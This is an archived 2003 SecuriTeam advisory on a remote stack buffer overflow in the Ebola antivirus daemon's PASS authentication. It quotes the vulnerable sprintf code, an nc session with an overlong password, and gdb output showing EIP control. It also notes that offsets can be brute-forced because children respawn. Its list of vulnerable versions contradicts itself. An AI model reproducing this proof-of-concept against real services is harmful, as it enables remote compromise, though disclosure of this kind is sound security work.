[UNIX] PLDaniels Ebola Remote Buffer Overflow

• Previous message: SecuriTeam: "[EXPL] Linux Kernel Do_brk(), Another Proof-of-Concept Code For I386"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

To: list@securiteam.com
Date: 7 Dec 2003 17:14:03 +0200

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -

  PLDaniels Ebola Remote Buffer Overflow
------------------------------------------------------------------------

SUMMARY

 <http://pldaniels.com/ebola/> Ebola is a AntiVirus scanning daemon system
which offers to improve considerably the performance of scanning systems
such as AMaViS, Inflex and other such programs which require ondemand
scanning from various AV engines. The Ebola daemon contains a remotely
exploitable buffer overflow in its authentication sequence.

DETAILS

Vulnerable systems:
 * Ebola version 0.1.5

Vulnerable systems:
 * Ebola version 0.1.4 and prior

This issue is caused by the handle_PASS() function in ebola.c
char outstr[100];
..
if (passwd) {
   if (PASS_authenticate(username, passwd) == _PASS_OK) {
  sprintf(outstr,"PASS NOT ACCEPTED for user \"%s\",
        pass \"%s\".\n",username,passwd);
..

Exploiting these issues is fairly simple... by providing either an overly
long password or username you can overflow the 100 byte buffer and over
write the EIP address.

bash-2.05b$ nc localhost 1665
Welcome to Ebola v0.1.4
user ZZZZXXX
USER name received, please send PASS
pass AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...ABCD
PASS NOT ACCEPTED for user "ZZZZXXX", pass "AAAAAAAAAAA...

A quick look in gdb shows us that this should be a vanilla stack overflow.

[root@RiotStarter root]# gdb ebola 10440
Attaching to process 10440
Reading symbols from /home/dotslash/ebola-0.1.4/ebola...
(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0x44434241 in ?? ()

(gdb) i r
eax 0x0 0
ecx 0xbffba7c4 -1074026556
edx 0x0 0
ebx 0x41414141 1094795585
esp 0xbffbaa10 0xbffbaa10
ebp 0x41414141 0x41414141
esi 0x41414141 1094795585
edi 0x41414141 1094795585
eip 0x44434241 0x44434241

The master ebola process never dies... its continues to spawn children
regardless of how many times you attempt to exploit the issue. Because of
this you can brute force both the length to eip and the offsets used for
shellcode.

Vendor Status:
Paul L Daniels promptly responded to this issue, a patch was available
immediately after it was reported.

ADDITIONAL INFORMATION

The information has been provided by <mailto:dotslash@snosoft.com> KF.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

• Previous message: SecuriTeam: "[EXPL] Linux Kernel Do_brk(), Another Proof-of-Concept Code For I386"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]